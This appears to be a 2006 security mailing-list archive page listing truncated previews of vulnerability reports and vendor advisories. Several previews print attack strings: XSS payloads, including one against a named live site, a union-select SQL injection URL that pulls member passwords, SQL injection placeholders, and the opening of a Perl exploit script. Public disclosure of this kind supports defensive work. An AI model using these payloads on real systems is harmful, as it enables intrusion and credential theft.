Does anyone know a good contact address for the security folks at the Janus Capital Group (www.janus.com)?

[ more ]  [ reply ]

I. SYNOPSIS

Release Date: 07/19/2006

Affected Application: Cisco CallManager 3.1 and up (versions prior to 3.1 were not tested but may
still be vulnerable)

Severity If Exploited: High

Impact: Arbitrary configuration of phone system/Theft of individual phone users' credentials

Mitigating Factors

[ more ]  [ reply ]

Credit's : n00b

email : co296 (at) aol (dot) com [email concealed]

Erm was wondering if you could take a close look at this it is a 0day dos exploit by me i found tonight in vmware i have even debug for you guy's to take a look at.I hope you guy's will put it up after checking through it.Ok the first thing is vmware us

[ more ]  [ reply ]

V3 Chat Instant Messenger

http://www.v3chat.com/

Affected files:

/mail/index.php

/mail/reply.php

is_online.php

online.php

profile.php

profileview.php

search.php

mycontacts.php

expire.php

* Editing your profile:

- input boxes

------------------------------------------

Mai

[ more ]  [ reply ]

+vendor : http://www.qto.com

+poral : qto file manager

+version : All version !

Exploit:

+http://www.xxx.xom/qto/index.php?msg=[xss]

[ more ]  [ reply ]

Dragons Kingdom Script v1.0

Homepage:

http://www.dkscript.com/

Affected files:

*Sending mail:

- Sending in-game mail

*Character Profiles:

- All input boxes of the profile

* Posting & Replying in the forum:

- Posting in the forum

- Replying in the forum

* Form spoofing can

[ more ]  [ reply ]

Hey

look this

http://www.securityfocus.com/archive/1/428976

i found this bugs in Mar 27 2006

http://www.worlddefacers.de/Public/WD-TMPLH.txt

[ more ]  [ reply ]

Produce : singapore gallery

Versions : 0.10.0 and prior

Site : http://www.sgal.org/

Discovred By : Moroccan Security Research Team (Simo64)

Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid

.:r00tkita - s4mi - Silitix - tahat

[ more ]  [ reply ]

Easy CMS 0.1.2 Php Shell Upload Vulnerabilities

----------------------------------------------------

site:http://sourceforge.net/projects/php-easy-cms/

demo:http://www.easy-cms.be/

--------------------------------------------------

Bug:

1)http://victim/choose_file.php

Documents

[ more ]  [ reply ]

vendor: http://onedotoh.sourceforge.net

version : all version :D !

exploit:

http://www.xxx.xom/fm/index.php?msg=xxs

++++++

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/misc.php?action=[SQL]

[ more ]  [ reply ]

=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/lng.php?QuranID=[SQL]

[ more ]  [ reply ]

#!/usr/bin/perl

#

# by DarkFig -- acid-root.new.fr

# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt

#

use IO::Socket;

use LWP::Simple;

# Header

print "\r\n+-------------------------------

[ more ]  [ reply ]

=============================================

Discovered By: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/message. php?UserID=[SQ

[ more ]  [ reply ]

=============================================

Discovered By: CrAzY CrAcKeR

Site: www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-Lover Hacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r

=============================================

Example:-

/rank.php?MemberID=[SQL

[ more ]  [ reply ]

http://target.xx/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript% 3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=

------------------

Submit comment

Subject: '><script>alert(/XSS/)</script>

Click Reply to this you comment.

Ellipsis Security

http

[ more ]  [ reply ]

------------------------------------------------------------------------
---

PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes

Local : No

Criti

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The InfoGuard Group Vulnerability Summary 2006-04

Application: Maximus' iCue and iParent (http://www.schoolmax.net)
Versions: All
Bugs: Cross-Site Scripting (XSS)
Date: 18 June 2006
Author: Charles H.
E-mail: charles

[ more ]  [ reply ]

As of Version SixCMS 6.0.6patch2 this Bug is fixed. The patch can be downloaded from our support site.

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00692635
Version: 2

HPSBTU02116 SSRT061135 rev.2 - HP Tru64 UNIX and HP Internet Express for Tru64 UNIX
Running sendmail, Remote Execution of Arbitrary Code or Denial of Service (DoS)

NOTICE: Th

[ more ]  [ reply ]

I have written FAQ document including 23 items about the new Excel 0-day vulnerability exploited by Trojan.

The document entitled as Microsoft Excel 0-day Vulnerability FAQ is located at
http://blogs.securiteam.com/index.php/archives/451

Permalink-type URL to the FAQ is http://blogs.securiteam.com

[ more ]  [ reply ]

# There is sql injection WeBBoA Hosting Script

# Rish=High

Exploit:

http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul
_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1

# Credit: EntriKa

[ more ]  [ reply ]

MPCS v0.2

Homepage:

http://tpvgames.co.uk/mpcs

Affected files:

comment.php

XSS vuln with cookie & full path disclosure:

Direct html injection doesnt seem to work, however, if you navigate to the code below in your browser, and then post a comment on the same page, our XSS

example w

[ more ]  [ reply ]

We from Black Box Magazine - Underground Inet-Security Research -- http://bboxnet.mine.nu

found Cross Site Scripting Vuln in http://www.newscientist.com/

Write this example in Search:

"><img src=javascript:a=/Defaced%20by%20Black%20Box%20Magazine/><img src=javascript:alert(a.source)>

[ more ]  [ reply ]

mp3.com - Cross site scripting vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 15th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

[ more ]  [ reply ]

Discovered By CrAsh_oVeR_rIdE

Vbzoom SQL Injection

site:www.vbzoom.com

Vulnerable: vbzoom V1.11

vulnerable files:forum.php

exploit:

http://www.sitname.com/vz/forum.php?UserID=1&MainID=[sql]&Page=1

--------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR

[ more ]  [ reply ]